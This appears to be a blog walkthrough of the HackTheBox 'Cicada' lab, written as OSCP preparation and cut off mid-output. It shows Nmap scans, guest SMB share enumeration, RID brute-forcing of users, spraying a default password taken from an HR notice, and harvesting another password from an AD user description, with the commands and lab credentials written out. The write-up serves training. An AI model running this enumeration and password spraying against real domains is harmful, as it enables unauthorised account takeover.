Cicada | HackTheBox | OSCP Preparation

medium.com · SilentExploit · 20 days ago · tutorial
quality 7/10 · good
0 net
Tags
bug-bounty
Cicada | HackTheBox | OSCP Preparation | by SilentExploit - Freedium Milestone: 20GB Reached We’ve reached 20GB of stored data — thank you for helping us grow! Patreon Ko-fi Liberapay Close < Go to the original Cicada | HackTheBox | OSCP Preparation Start off by setting the target machine's IP as an environment variable: SilentExploit Follow ~18 min read · March 23, 2026 (Updated: March 23, 2026) · Free: Yes ┌──(root㉿user)-[/home/user/bhs] └─# export target=10.129.231.149 ┌──(root㉿user)-[/home/user/bhs] └─# echo $target 10.129.231.149 This way, we don't have to constantly type in the IP whenever we want to run tools against the target. I start with a large Nmap scan of the target: on medium / hard boxes you'll be looking at what services are available (website, APIs etc.) whereas on the easy boxes it's more of a precursory measure just to get a quick lay of the land. ┌──(root㉿user)-[/home/user/Downloads/OSCP] └─# nmap -p- -Pn $target -v -T5 --min-rate 1500 --max-rtt-timeout 500ms --max-retries 3 --open -oN nmap.txt && nmap -Pn $target -sVC -v && nmap $target -v --script vuln -T5 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-22 11:52 PDT Initiating SYN Stealth Scan at 11:52 Scanning cicada.htb (10.129.231.149) [65535 ports] Discovered open port 53/tcp on 10.129.231.149 Discovered open port 445/tcp on 10.129.231.149 Discovered open port 139/tcp on 10.129.231.149 Discovered open port 135/tcp on 10.129.231.149 Discovered open port 389/tcp on 10.129.231.149 Discovered open port 88/tcp on 10.129.231.149 SYN Stealth Scan Timing: About 35.04% done; ETC: 11:53 (0:00:57 remaining) Discovered open port 5985/tcp on 10.129.231.149 Discovered open port 5985/tcp on 10.129.231.149 Discovered open port 464/tcp on 10.129.231.149 Discovered open port 636/tcp on 10.129.231.149 SYN Stealth Scan Timing: About 67.07% done; ETC: 11:54 (0:00:43 remaining) Discovered open port 3268/tcp on 10.129.231.149 Discovered open port 3269/tcp on 10.129.231.149 Completed SYN Stealth Scan at 11:54, 131.68s elapsed (65535 total ports) Nmap scan report for cicada.htb (10.129.231.149) Host is up (0.22s latency). Not shown: 65524 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5985/tcp open wsman Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in 131.78 seconds Raw packets sent: 196676 (8.654MB) | Rcvd: 229 (27.033KB) Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-22 11:54 PDT NSE: Loaded 157 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 11:54 Completed NSE at 11:54, 0.00s elapsed Initiating NSE at 11:54 Completed NSE at 11:54, 0.00s elapsed Initiating NSE at 11:54 Completed NSE at 11:54, 0.00s elapsed Initiating SYN Stealth Scan at 11:54 Scanning cicada.htb (10.129.231.149) [1000 ports] Discovered open port 139/tcp on 10.129.231.149 Discovered open port 53/tcp on 10.129.231.149 Discovered open port 135/tcp on 10.129.231.149 Discovered open port 445/tcp on 10.129.231.149 Discovered open port 3269/tcp on 10.129.231.149 Discovered open port 88/tcp on 10.129.231.149 Discovered open port 5985/tcp on 10.129.231.149 Discovered open port 3268/tcp on 10.129.231.149 Discovered open port 389/tcp on 10.129.231.149 Discovered open port 636/tcp on 10.129.231.149 Discovered open port 464/tcp on 10.129.231.149 Discovered open port 464/tcp on 10.129.231.149 Completed SYN Stealth Scan at 11:55, 24.90s elapsed (1000 total ports) Initiating Service scan at 11:55 Scanning 11 services on cicada.htb (10.129.231.149) Completed Service scan at 11:55, 48.18s elapsed (11 services on 1 host) NSE: Script scanning 10.129.231.149. Initiating NSE at 11:55 Completed NSE at 11:56, 40.17s elapsed Initiating NSE at 11:56 Completed NSE at 11:56, 2.68s elapsed Initiating NSE at 11:56 Completed NSE at 11:56, 0.00s elapsed Nmap scan report for cicada.htb (10.129.231.149) Host is up (0.17s latency). Not shown: 989 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-23 01:55:16Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:CICADA-DC.cicada.htb | Issuer: commonName=CICADA-DC-CA | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-08-22T20:24:16 | Not valid after: 2025-08-22T20:24:16 | MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65 |_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a |_ssl-date: 2026-03-23T01:56:41+00:00; +7h00m05s from scanner time. 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) |_ssl-date: 2026-03-23T01:56:40+00:00; +7h00m04s from scanner time. | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:CICADA-DC.cicada.htb | Issuer: commonName=CICADA-DC-CA | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-08-22T20:24:16 | Not valid after: 2025-08-22T20:24:16 | MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65 |_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:CICADA-DC.cicada.htb | Issuer: commonName=CICADA-DC-CA | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-08-22T20:24:16 | Not valid after: 2025-08-22T20:24:16 | MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65 |_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a |_ssl-date: 2026-03-23T01:56:41+00:00; +7h00m05s from scanner time. 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:, DNS:CICADA-DC.cicada.htb | Issuer: commonName=CICADA-DC-CA | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2024-08-22T20:24:16 | Not valid after: 2025-08-22T20:24:16 | MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65 |_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a |_ssl-date: 2026-03-23T01:56:40+00:00; +7h00m04s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2026-03-23T01:56:00 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: mean: 7h00m04s, deviation: 0s, median: 7h00m04s NSE: Script Post-scanning. Initiating NSE at 11:56 Completed NSE at 11:56, 0.00s elapsed Initiating NSE at 11:56 Completed NSE at 11:56, 0.00s elapsed Initiating NSE at 11:56 Completed NSE at 11:56, 0.01s elapsed Read data files from: /usr/share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 116.46 seconds Raw packets sent: 2991 (131.604KB) | Rcvd: 23 (1.012KB) Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-22 11:56 PDT NSE: Loaded 105 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 11:56 NSE Timing: About 46.15% done; ETC: 11:57 (0:00:40 remaining) Completed NSE at 11:57, 36.36s elapsed Initiating NSE at 11:57 Completed NSE at 11:57, 0.00s elapsed Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Initiating Ping Scan at 11:57 Scanning 10.129.231.149 [4 ports] Completed Ping Scan at 11:57, 0.17s elapsed (1 total hosts) Initiating SYN Stealth Scan at 11:57 Scanning cicada.htb (10.129.231.149) [1000 ports] Discovered open port 53/tcp on 10.129.231.149 Discovered open port 445/tcp on 10.129.231.149 Discovered open port 135/tcp on 10.129.231.149 Discovered open port 139/tcp on 10.129.231.149 Discovered open port 5985/tcp on 10.129.231.149 Discovered open port 389/tcp on 10.129.231.149 Discovered open port 464/tcp on 10.129.231.149 Discovered open port 88/tcp on 10.129.231.149 Discovered open port 3269/tcp on 10.129.231.149 Discovered open port 636/tcp on 10.129.231.149 Discovered open port 3268/tcp on 10.129.231.149 Completed SYN Stealth Scan at 11:57, 9.29s elapsed (1000 total ports) NSE: Script scanning 10.129.231.149. Initiating NSE at 11:57 Completed NSE at 11:58, 45.74s elapsed Initiating NSE at 11:58 Completed NSE at 11:58, 0.01s elapsed Nmap scan report for cicada.htb (10.129.231.149) Host is up (0.14s latency). Not shown: 989 filtered tcp ports (no-response) PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5985/tcp open wsman Host script results: |_smb-vuln-ms10-054: false |_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR |_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR NSE: Script Post-scanning. Initiating NSE at 11:58 Completed NSE at 11:58, 0.00s elapsed Initiating NSE at 11:58 Completed NSE at 11:58, 0.00s elapsed Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in 91.98 seconds Raw packets sent: 1996 (87.800KB) | Rcvd: 15 (644B) Important bits of information to add to your /etc/hosts file: Domain: cicada.htb FQDN: CICADA-DC.cicada.htb ┌──(root㉿user)-[/home/user/bhs] └─# cat /etc/hosts 10.129.231.149 cicada.htb CICADA-DC.cicada.htb I enumerated whether the SMB shares have a guest account which allows login with a blank password and then used Netexec's Spider module to produce a json file containing a tree like structure of all the files contained in the shares (this is a good tool to get in the habit of using as it prevents you from manually trawling through large directory structures). ┌──(root㉿user)-[/home/user] └─# nxc smb $target -u guest -p '' --shares SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\guest: SMB 10.129.231.149 445 CICADA-DC [*] Enumerated shares SMB 10.129.231.149 445 CICADA-DC Share Permissions Remark SMB 10.129.231.149 445 CICADA-DC ----- ----------- ------ SMB 10.129.231.149 445 CICADA-DC ADMIN$ Remote Admin SMB 10.129.231.149 445 CICADA-DC C$ Default share SMB 10.129.231.149 445 CICADA-DC DEV SMB 10.129.231.149 445 CICADA-DC HR READ SMB 10.129.231.149 445 CICADA-DC IPC$ READ Remote IPC SMB 10.129.231.149 445 CICADA-DC NETLOGON Logon server share SMB 10.129.231.149 445 CICADA-DC SYSVOL Logon server share ┌──(root㉿user)-[/home/user] └─# nxc smb $target -u guest -p '' -M spider_plus SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\guest: SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] Started module spidering_plus with the following options: SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] DOWNLOAD_FLAG: False SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] STATS_FLAG: True SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] EXCLUDE_FILTER: ['print$', 'ipc$'] SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] EXCLUDE_EXTS: ['ico', 'lnk'] SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] MAX_FILE_SIZE: 50 KB SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] OUTPUT_FOLDER: /root/.nxc/modules/nxc_spider_plus SMB 10.129.231.149 445 CICADA-DC [*] Enumerated shares SMB 10.129.231.149 445 CICADA-DC Share Permissions Remark SMB 10.129.231.149 445 CICADA-DC ----- ----------- ------ SMB 10.129.231.149 445 CICADA-DC ADMIN$ Remote Admin SMB 10.129.231.149 445 CICADA-DC C$ Default share SMB 10.129.231.149 445 CICADA-DC DEV SMB 10.129.231.149 445 CICADA-DC HR READ SMB 10.129.231.149 445 CICADA-DC IPC$ READ Remote IPC SMB 10.129.231.149 445 CICADA-DC NETLOGON Logon server share SMB 10.129.231.149 445 CICADA-DC SYSVOL Logon server share SPIDER_PLUS 10.129.231.149 445 CICADA-DC [+] Saved share-file metadata to "/root/.nxc/modules/nxc_spider_plus/10.129.231.149.json". SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] SMB Shares: 7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL) SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] SMB Readable Shares: 2 (HR, IPC$) SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] SMB Filtered Shares: 1 SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] Total folders found: 0 SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] Total files found: 1 SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] File size average: 1.24 KB SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] File size min: 1.24 KB SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] File size max: 1.24 KB ──(root㉿user)-[/home/user] └─# cat /root/.nxc/modules/nxc_spider_plus/10.129.231.149.json { "HR": { "Notice from HR.txt": { "atime_epoch": "2024-08-28 10:31:48", "ctime_epoch": "2024-03-14 05:29:03", "mtime_epoch": "2024-08-28 10:31:48", "size": "1.24 KB" } } } This file 'Notice From HR.txt' is the only file our guest has access to. The fact that it's a non standard share (NETLOGON, SYSVOL etc. are default; doesn't mean they are not worth enumerating but you want to go for the juicy stuff first). If we download and cat this Notice from HR we see the following: ┌──(root㉿user)-[/home/user] └─# smbclient //10.129.231.149/'HR' -U guest Password for [WORKGROUP\guest]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Thu Mar 14 05:29:09 2024 .. D 0 Thu Mar 14 05:21:29 2024 Notice from HR.txt A 1266 Wed Aug 28 10:31:48 2024 ge 4168447 blocks of size 4096. 477444 blocks available smb: \> get "Notice from HR.txt" getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (1.9 KiloBytes/sec) (average 1.9 KiloBytes/sec) smb: \> ^C Dear new hire! Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default passwor> Your default password is: Cicada$M6Corpb*@Lp#nZp!8 Now; we have a default password but we don't know which user it applies to. The simple solution here is to spray the password against all the users in the domain. Use the --rid-brute in Netexec to give us a list of the users that we can save into a line by line userlist ( users.txt) ┌──(root㉿user)-[/home/user] └─# nxc smb $target -u guest -p '' --rid-brute SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\guest: SMB 10.129.231.149 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup) SMB 10.129.231.149 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser) SMB 10.129.231.149 445 CICADA-DC 501: CICADA\Guest (SidTypeUser) SMB 10.129.231.149 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser) SMB 10.129.231.149 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup) SMB 10.129.231.149 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup) SMB 10.129.231.149 445 CICADA-DC 514: CICADA\Domain Guests (SidTypeGroup) SMB 10.129.231.149 445 CICADA-DC 515: CICADA\Domain Computers (SidTypeGroup) SMB 10.129.231.149 445 CICADA-DC 516: CICADA\Domain Controllers (SidTypeGroup) SMB 10.129.231.149 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias) SMB 10.129.231.149 445 CICADA-DC 518: CICADA\Schema Admins (SidTypeGroup) SMB 10.129.231.149 445 CICADA-DC 519: CICADA\Enterprise Admins (SidTypeGroup) SMB 10.129.231.149 445 CICADA-DC 520: CICADA\Group Policy Creator Owners (SidTypeGroup) SMB 10.129.231.149 445 CICADA-DC 521: CICADA\Read-only Domain Controllers (SidTypeGroup) SMB 10.129.231.149 445 CICADA-DC 522: CICADA\Cloneable Domain Controllers (SidTypeGroup) SMB 10.129.231.149 445 CICADA-DC 525: CICADA\Protected Users (SidTypeGroup) SMB 10.129.231.149 445 CICADA-DC 526: CICADA\Key Admins (SidTypeGroup) SMB 10.129.231.149 445 CICADA-DC 527: CICADA\Enterprise Key Admins (SidTypeGroup) SMB 10.129.231.149 445 CICADA-DC 553: CICADA\RAS and IAS Servers (SidTypeAlias) SMB 10.129.231.149 445 CICADA-DC 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias) SMB 10.129.231.149 445 CICADA-DC 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias) SMB 10.129.231.149 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser) SMB 10.129.231.149 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias) SMB 10.129.231.149 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup) SMB 10.129.231.149 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup) SMB 10.129.231.149 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser) SMB 10.129.231.149 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser) SMB 10.129.231.149 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser) SMB 10.129.231.149 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser) SMB 10.129.231.149 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup) SMB 10.129.231.149 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser) Note: if you want to cat the above output directly into a line by line user file (separating all account names listed as SIDTYPEUSER) then use this: ┌──(root㉿user)-[/home/user] └─# nxc smb $target -u guest -p '' --rid-brute | grep '(SidTypeUser)' | awk '{print $6}' | cut -d'\' -f2 Administrator Guest krbtgt CICADA-DC$ john.smoulder sarah.dantelia michael.wrightson david.orelious emily.oscars Spray this password against the userlist and you can see you have a successful login for michael.wrightson: ┌──(root㉿user)-[/home/user] └─# nxc smb $target -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE SMB 10.129.231.149 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 I then enumerated the shares as michael.wrightson: ┌──(root㉿user)-[/home/user] └─# nxc smb $target -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 SMB 10.129.231.149 445 CICADA-DC [*] Enumerated shares SMB 10.129.231.149 445 CICADA-DC Share Permissions Remark SMB 10.129.231.149 445 CICADA-DC ----- ----------- ------ SMB 10.129.231.149 445 CICADA-DC ADMIN$ Remote Admin SMB 10.129.231.149 445 CICADA-DC C$ Default share SMB 10.129.231.149 445 CICADA-DC DEV SMB 10.129.231.149 445 CICADA-DC HR READ SMB 10.129.231.149 445 CICADA-DC IPC$ READ Remote IPC SMB 10.129.231.149 445 CICADA-DC NETLOGON READ Logon server share SMB 10.129.231.149 445 CICADA-DC SYSVOL READ Logon server share ┌──(root㉿user)-[/home/user] └─# nxc smb $target -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' -M spider_plus SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] Started module spidering_plus with the following options: SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] DOWNLOAD_FLAG: False SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] STATS_FLAG: True SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] EXCLUDE_FILTER: ['print$', 'ipc$'] SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] EXCLUDE_EXTS: ['ico', 'lnk'] SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] MAX_FILE_SIZE: 50 KB SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] OUTPUT_FOLDER: /root/.nxc/modules/nxc_spider_plus SMB 10.129.231.149 445 CICADA-DC [*] Enumerated shares SMB 10.129.231.149 445 CICADA-DC Share Permissions Remark SMB 10.129.231.149 445 CICADA-DC ----- ----------- ------ SMB 10.129.231.149 445 CICADA-DC ADMIN$ Remote Admin SMB 10.129.231.149 445 CICADA-DC C$ Default share SMB 10.129.231.149 445 CICADA-DC DEV SMB 10.129.231.149 445 CICADA-DC HR READ SMB 10.129.231.149 445 CICADA-DC IPC$ READ Remote IPC SMB 10.129.231.149 445 CICADA-DC NETLOGON READ Logon server share SMB 10.129.231.149 445 CICADA-DC SYSVOL READ Logon server share SPIDER_PLUS 10.129.231.149 445 CICADA-DC [+] Saved share-file metadata to "/root/.nxc/modules/nxc_spider_plus/10.129.231.149.json". SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] SMB Shares: 7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL) SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] SMB Readable Shares: 4 (HR, IPC$, NETLOGON, SYSVOL) SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] SMB Filtered Shares: 1 SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] Total folders found: 33 SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] Total files found: 11 SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] File size average: 1.14 KB SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] File size min: 23 B SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] File size max: 5.22 KB Although he had read access to other shares; there was nothing fruitful contained in there. I also tried kerberoasting with his credentials but this didn't work. In CTFs, the next step is HUGE in AD. Enumerate the description column for users on the domain. If there are going to be rogue plain text credentials I always check here (I recently did a CTF where the user:pass was in the ldapsearch output so keep an open mind but add this check to your list) : ┌──(root㉿user)-[/home/user] └─# nxc smb $target -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 SMB 10.129.231.149 445 CICADA-DC -Username- -Last PW Set- -BadPW- -Description- SMB 10.129.231.149 445 CICADA-DC Administrator 2024-08-26 20:08:03 0 Built-in account for administering the computer/domain SMB 10.129.231.149 445 CICADA-DC Guest 2024-08-28 17:26:56 0 Built-in account for guest access to the computer/domain SMB 10.129.231.149 445 CICADA-DC krbtgt 2024-03-14 11:14:10 0 Key Distribution Center Service Account SMB 10.129.231.149 445 CICADA-DC john.smoulder 2024-03-14 12:17:29 0 SMB 10.129.231.149 445 CICADA-DC sarah.dantelia 2024-03-14 12:17:29 0 SMB 10.129.231.149 445 CICADA-DC michael.wrightson 2024-03-14 12:17:29 0 SMB 10.129.231.149 445 CICADA-DC david.orelious 2024-03-14 12:17:29 0 Just in case I forget my password is aRt$Lp#7t*VQ!3 SMB 10.129.231.149 445 CICADA-DC emily.oscars 2024-08-22 21:20:17 0 SMB 10.129.231.149 445 CICADA-DC [*] Enumerated 8 local users: CICADA We now have this new credential: david.orelious:aRt$Lp#7t*VQ!3 I run the spider module against his account: ┌──(root㉿user)-[/home/user] └─# nxc smb $target -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 SMB 10.129.231.149 445 CICADA-DC [*] Enumerated shares SMB 10.129.231.149 445 CICADA-DC Share Permissions Remark SMB 10.129.231.149 445 CICADA-DC ----- ----------- ------ SMB 10.129.231.149 445 CICADA-DC ADMIN$ Remote Admin SMB 10.129.231.149 445 CICADA-DC C$ Default share SMB 10.129.231.149 445 CICADA-DC DEV READ SMB 10.129.231.149 445 CICADA-DC HR READ SMB 10.129.231.149 445 CICADA-DC IPC$ READ Remote IPC SMB 10.129.231.149 445 CICADA-DC NETLOGON READ Logon server share SMB 10.129.231.149 445 CICADA-DC SYSVOL READ Logon server share ┌──(root㉿user)-[/home/user] └─# nxc smb $target -u david.orelious -p 'aRt$Lp#7t*VQ!3' -M spider_plus SMB 10.129.231.149 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) SMB 10.129.231.149 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3 SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] Started module spidering_plus with the following options: SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] DOWNLOAD_FLAG: False SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] STATS_FLAG: True SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] EXCLUDE_FILTER: ['print$', 'ipc$'] SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] EXCLUDE_EXTS: ['ico', 'lnk'] SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] MAX_FILE_SIZE: 50 KB SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] OUTPUT_FOLDER: /root/.nxc/modules/nxc_spider_plus SMB 10.129.231.149 445 CICADA-DC [*] Enumerated shares SMB 10.129.231.149 445 CICADA-DC Share Permissions Remark SMB 10.129.231.149 445 CICADA-DC ----- ----------- ------ SMB 10.129.231.149 445 CICADA-DC ADMIN$ Remote Admin SMB 10.129.231.149 445 CICADA-DC C$ Default share SMB 10.129.231.149 445 CICADA-DC DEV READ SMB 10.129.231.149 445 CICADA-DC HR READ SMB 10.129.231.149 445 CICADA-DC IPC$ READ Remote IPC SMB 10.129.231.149 445 CICADA-DC NETLOGON READ Logon server share SMB 10.129.231.149 445 CICADA-DC SYSVOL READ Logon server share SPIDER_PLUS 10.129.231.149 445 CICADA-DC [+] Saved share-file metadata to "/root/.nxc/modules/nxc_spider_plus/10.129.231.149.json". SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] SMB Shares: 7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL) SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] SMB Readable Shares: 5 (DEV, HR, IPC$, NETLOGON, SYSVOL) SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] SMB Filtered Shares: 1 SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] Total folders found: 33 SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] Total files found: 12 SPIDER_PLUS 10.129.231.149 445 CICADA-DC [*] File size average: 1.09 